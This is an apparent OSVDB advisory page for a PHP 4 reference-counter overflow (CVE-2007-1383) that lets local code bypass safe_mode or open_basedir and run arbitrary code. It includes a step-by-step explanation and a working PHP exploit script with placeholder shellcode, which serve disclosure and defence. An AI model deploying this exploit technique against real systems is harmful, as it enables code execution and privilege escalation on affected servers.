32770 : PHP ZVAL Structure Reference Counter Local Overflow
Printer | http://osvdb.org/32770 | Email This | Edit Vulnerability

Views This Week	Views All Time	Added to OSVDB	Last Modified	Modified (since 2008)	Percent Complete
14	779	over 4 years ago	about 1 year ago	2 times	90%

Timeline

Disclosure Date	Exploit Publish Date
2007-03-01	2007-03-01

Description

PHP contains a flaw that may allow a malicious local user to bypass restrictions enforced by disable_functions, open_basedir, and safe_mode, or to launch direct local root exploits against the affected system. The issue is due to the possibility of a PHP application that is run in PHP 4 overflowing the zend_ushort refcount variable in _zval_struct through the creation of a large number of references for a specific variable, resulting in a double destruction of the underlying variable. It is possible that the flaw may allow a local attacker to execute arbitrary code within the process executing PHP resulting in a loss of integrity.

Classification

Location: Local Access Required
Attack Type: Input Manipulation
Impact: Loss of Integrity
Exploit: Exploit Public
Disclosure: OSVDB Verified

Technical

When the PHP 4 ZVAL structure was designed, the refcount variable was made 16 bits wide. In PHP 5 this field is 32 bits wide, due to the ease of overflowing a 16 bit counter and due to PHP not having internal protection against overflows of the reference counter.

---------------------
ZVAL Structure
---------------------
struct _zval_struct {
zvalue_value value; /* value */
zend_uchar type; /* active type */
zend_uchar is_ref;
zend_ushort refcount;
};

------------------------------
Exploit Explanation
------------------------------
1) Create a string that has the same size as a Hashtable
2) Create 65536 references to it to overflow the refcount variable
3) Free one of these references
-> Refcount drops down to 0
-> String gets freed
4) Free some more zvals
5) Create a new array with one element
-> Put shellcode in the key
-> Hashtable struct will be in the same place as the string
6) Use string to directly access the content of the Hashtable
-> Read pointer to first bucket
-> Add 32 bytes, offset to array key
-> Write pointer to the destructor field
7) Unset array
-> Executes code in $shellcode

---------------
Exploit
---------------
// the exploit is without real shell code and, as such, will only trigger the debugger
// Just make sure that the shellcode string is long enough to not end up in PHP's internal memory cache
<?php
die("REMOVE THIS LINE");
$shellcode = str_repeat(chr(0xcc), 500);
$________________________str = str_repeat("A", 39);
$________________________yyy = &$________________________str;
$________________________xxx = &$________________________str;
for ($i = 0; $i < 65534; $i++) $arr[] = &$________________________str;
$________________________aaa = " XXXXX ";
$________________________aab = " XXXx.xXXX ";
$________________________aac = " XXXx.xXXX ";
$________________________aad = " XXXXX ";
unset($________________________xxx);
unset($________________________aaa);
unset($________________________aab);
unset($________________________aac);
unset($________________________aad);
$arr = array($shellcode => 1);
$addr = unpack("L", substr($________________________str, 6*4, 4));
$addr = $addr[1] + 32;
$addr = pack("L", $addr);
for ($i=0; $i<strlen($addr); $i++) {
$________________________str[8*4+$i] = $addr[$i];
$________________________yyy[8*4+$i] = $addr[$i];
}
unset($arr);
?>

Solution

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround(s): Manually change the size of the reference counter in your own PHP. The problem with this approach is that you will have to recompile all your PHP extensions and will not be able to use closed source PHP extensions.

Products

The PHP Group	PHP	4.4.6
		4.4.5
		4.4.4
		4.4.3
		4.4.2
		4.4.1
		4.4.0
		4.3.x
		4.2.x
		4.1.x
		4.0.x
		4.0, Release Candidate 2
		4.0, Release Candidate 1
		4.0 Beta 4
		4.0 Beta 3
		4.0 Beta 2
		4.0 Beta 1

References

CVE ID: 2007-1383 (see also: NVD)
Bugtraq ID: 22765
Secunia Advisory ID: 24356 24419 24606 24606 24910 24924 24941 24945 25025 25056 25062
Milw0rm: 3394
Exploit Database: 3394
Other Advisory URL: http://lists.rpath.com/pipermail/security-announce/2007-April/000176.html
http://www.gentoo.org/security/en/glsa/glsa-200703-21.xml
http://www.novell.com/linux/security/advisories/2007_32_php.html
http://www.php-security.org/MOPB/MOPB-01-2007.html
http://www.trustix.org/errata/2007/0009/
http://www.us.debian.org/security/2007/dsa-1282
http://www.us.debian.org/security/2007/dsa-1283
Vendor Specific Solution URL: http://security.gentoo.org/glsa/glsa-200703-21.xml
Generic Exploit URL: http://www.php-security.org/MOPB/code/MOPB-01-2007.php
Vendor URL: http://www.php.net/
News Article: http://www.techworld.com/security/news/index.cfm?newsID=8175
RedHat RHSA: RHSA-2007:0154 RHSA-2007:0155 RHSA-2007:0163

Tools & Filters

	24887

Credit

Stefan Esser - sesserhardened-php.net - www.hardened-php.net

CVSSv2 Score

CVSSv2 Base Score = 10.0
Source: nvd.nist.gov | Generated: 2007-03-12 | Disagree?

Blogs

This product uses the Daylife API but is not endorsed or certified by Daylife.

This section lists the latest news and blogs found via the daylife API (and for older items, the technorati API), which mention or otherwise discuss this vulnerability.

None found at this time

Comments

Add Comment Hide Add Comment

No Comments.

The database information may change without any notice. Use of the information constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the copyright holder or distributor (OSVDB or OSF) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.